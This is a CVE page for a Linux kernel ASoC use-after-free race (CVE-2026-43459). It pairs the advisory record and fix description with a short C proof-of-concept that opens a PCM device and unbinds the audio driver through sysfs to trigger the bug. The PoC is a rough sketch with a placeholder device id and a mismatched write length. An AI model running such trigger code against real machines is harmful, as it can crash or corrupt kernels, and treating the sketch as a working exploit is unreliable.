CVE-2026-43459

/* * PoC Concept for CVE-2026-43459 * This code attempts to trigger the race condition by * keeping a PCM stream open while unbinding the driver. */ #include <fcntl.h> #include <unistd.h> #include <stdio.h> #include <sys/ioctl.h> int main() { // Attempt to open a PCM device (e.g., default or hw:0,0) int fd = open("/dev/snd/pcmC0D0p", O_RDWR); if (fd < 0) { perror("Failed to open PCM device"); return 1; } printf("PCM device opened. Triggering unbind via sysfs..."); // Trigger the unbind process (requires root/permissions) // This simulates the 'unbind' event mentioned in the CVE int sysfs_fd = open("/sys/bus/platform/drivers/soc-audio/unbind", O_WRONLY); if (sysfs_fd > 0) { write(sysfs_fd, "sound_device_id", 14); close(sysfs_fd); } // Keep the file open for a moment to allow the delayed work to race sleep(1); close(fd); return 0; }

{"cve": {"id": "CVE-2026-43459", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:58.753", "lastModified": "2026-05-11T08:16:15.097", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: soc-core: flush delayed work before removing DAIs and widgets\n\nWhen a sound card is unbound while a PCM stream is open, a\nuse-after-free can occur in snd_soc_dapm_stream_event(), called from\nthe close_delayed_work workqueue handler.\n\nDuring unbind, snd_soc_unbind_card() flushes delayed work and then\ncalls soc_cleanup_card_resources(). Inside cleanup,\nsnd_card_disconnect_sync() releases all PCM file descriptors, and\nthe resulting PCM close path can call snd_soc_dapm_stream_stop()\nwhich schedules new delayed work with a pmdown_time timer delay.\nSince this happens after the flush in snd_soc_unbind_card(), the\nnew work is not caught. soc_remove_link_components() then frees\nDAPM widgets before this work fires, leading to the use-after-free.\n\nThe existing flush in soc_free_pcm_runtime() also cannot help as it\nruns after soc_remove_link_components() has already freed the widgets.\n\nAdd a flush in soc_cleanup_card_resources() after\nsnd_card_disconnect_sync() (after which no new PCM closes can\nschedule further delayed work) and before soc_remove_link_dais()\nand soc_remove_link_components() (which tear down the structures the\ndelayed work accesses)."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/231568afbc0cd25b8fb2a94ebf9738eabe1cf007", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/317a9298c54bb00319da73e5a7179f00e67fcbdf", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/3887e514978d28216246360b46a9cb534969eb5a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/7d33e6140945482a07f8089ee86e13e02553ffdb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/95bc5c225513fc3c4ce169563fb5e3929fbb938b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/bf80a89da97285d9b877e0c6995e870d46b8025c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c054f0607c8bb1b1aa529bc109e4149298a1cccd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/eab71e11ce2447c1e01809cbc11eab4234cf8dc8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}